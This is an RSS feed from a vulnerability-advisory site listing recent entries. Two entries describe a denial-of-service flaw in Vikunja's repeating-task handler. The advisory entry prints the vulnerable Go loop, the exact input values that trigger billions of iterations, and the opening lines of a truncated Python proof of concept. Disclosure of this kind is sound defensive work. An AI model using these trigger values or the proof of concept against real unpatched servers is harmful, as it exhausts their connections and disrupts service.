<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Mon, 05 Oct 2026 05:09:59 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-290479</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-290479</link>
      <description>EUVD-2026-290479</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-290479</guid>
    </item>
    <item>
      <title>fkie_cve-2026-35599</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-35599</link>
      <description>&lt;p&gt;Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the addRepeatIntervalToTime function uses an O(n) loop that advances a date by the task&amp;#39;s RepeatAfter duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request. This vulnerability is fixed in 2.3.0.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the addRepeatIntervalToTime function uses an O(n) loop that advances a date by the task&amp;#39;s RepeatAfter duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request. This vulnerability is fixed in 2.3.0.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-35599</guid>
    </item>
    <item>
      <title>GHSA-r4fg-73rc-hhh7 — Vikunja has Algorithmic Complexity DoS in Repeating Task Handler</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-r4fg-73rc-hhh7</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: code.vikunja.io/api&lt;/p&gt;
&lt;p&gt;## Summary&lt;/p&gt;
&lt;p&gt;The `addRepeatIntervalToTime` function uses an O(n) loop that advances a date by the task&amp;#39;s `RepeatAfter` duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request.&lt;/p&gt;
&lt;p&gt;## Details&lt;/p&gt;
&lt;p&gt;The vulnerable function at `pkg/models/tasks.go:1456-1464`:&lt;/p&gt;
&lt;p&gt;```go
func addRepeatIntervalToTime(now, t time.Time, duration time.Duration) time.Time {
    for {
        t = t.Add(duration)
        if t.After(now) {
            break
        }
    }
    return t
}
```&lt;/p&gt;
&lt;p&gt;The `RepeatAfter` field accepts any positive integer (validated as `range(0|9223372036854775807)`), and `DueDate` accepts any valid timestamp including dates far in the past. When a task with `repeat_after=1` and `due_date=1900-01-01` is marked as done, the loop runs approximately 4 billion iterations (~60+ seconds of CPU time).&lt;/p&gt;
&lt;p&gt;Each request holds a goroutine and a database connection for the duration. With the default connection pool size of 100, approximately 100 concurrent requests exhaust all available connections.&lt;/p&gt;
&lt;p&gt;## Proof of Concept&lt;/p&gt;
&lt;p&gt;Tested on Vikunja v2.2.2.&lt;/p&gt;
&lt;p&gt;```python
import requests, time&lt;/p&gt;
&lt;p&gt;TARGET = &amp;#34;http://localhost:3456&amp;#34;
API = f&amp;#34;{TARGET}/api/v1&amp;#34;&lt;/p&gt;
&lt;p&gt;token = requests.post(f&amp;#34;{API}/login&amp;#34;,
    json={&amp;#34;username&amp;#34;: &amp;#34;user1&amp;#34;, &amp;#34;password&amp;#34;: &amp;#34;User1pass!&amp;#34;}).json()[&amp;#34;token&amp;#34;]
h = {&amp;#34;Authorization&amp;#34;: f&amp;#34;Bearer {token}&amp;#34;, &amp;#34;Content-Type&amp;#34;: &amp;#34;applicatio…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: code.vikunja.io/api&lt;/p&gt;
&lt;p&gt;## Summary&lt;/p&gt;
&lt;p&gt;The `addRepeatIntervalToTime` function uses an O(n) loop that advances a date by the task&amp;#39;s `RepeatAfter` duration until it exceeds the current time. By creating a repeating task with a 1-second interval and a due date far in the past, an attacker triggers billions of loop iterations, consuming CPU and holding a database connection for minutes per request.&lt;/p&gt;
&lt;p&gt;## Details&lt;/p&gt;
&lt;p&gt;The vulnerable function at `pkg/models/tasks.go:1456-1464`:&lt;/p&gt;
&lt;p&gt;```go
func addRepeatIntervalToTime(now, t time.Time, duration time.Duration) time.Time {
    for {
        t = t.Add(duration)
        if t.After(now) {
            break
        }
    }
    return t
}
```&lt;/p&gt;
&lt;p&gt;The `RepeatAfter` field accepts any positive integer (validated as `range(0|9223372036854775807)`), and `DueDate` accepts any valid timestamp including dates far in the past. When a task with `repeat_after=1` and `due_date=1900-01-01` is marked as done, the loop runs approximately 4 billion iterations (~60+ seconds of CPU time).&lt;/p&gt;
&lt;p&gt;Each request holds a goroutine and a database connection for the duration. With the default connection pool size of 100, approximately 100 concurrent requests exhaust all available connections.&lt;/p&gt;
&lt;p&gt;## Proof of Concept&lt;/p&gt;
&lt;p&gt;Tested on Vikunja v2.2.2.&lt;/p&gt;
&lt;p&gt;```python
import requests, time&lt;/p&gt;
&lt;p&gt;TARGET = &amp;#34;http://localhost:3456&amp;#34;
API = f&amp;#34;{TARGET}/api/v1&amp;#34;&lt;/p&gt;
&lt;p&gt;token = requests.post(f&amp;#34;{API}/login&amp;#34;,
    json={&amp;#34;username&amp;#34;: &amp;#34;user1&amp;#34;, &amp;#34;password&amp;#34;: &amp;#34;User1pass!&amp;#34;}).json()[&amp;#34;token&amp;#34;]
h = {&amp;#34;Authorization&amp;#34;: f&amp;#34;Bearer {token}&amp;#34;, &amp;#34;Content-Type&amp;#34;: &amp;#34;applicatio…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-r4fg-73rc-hhh7</guid>
    </item>
  </channel>
</rss>
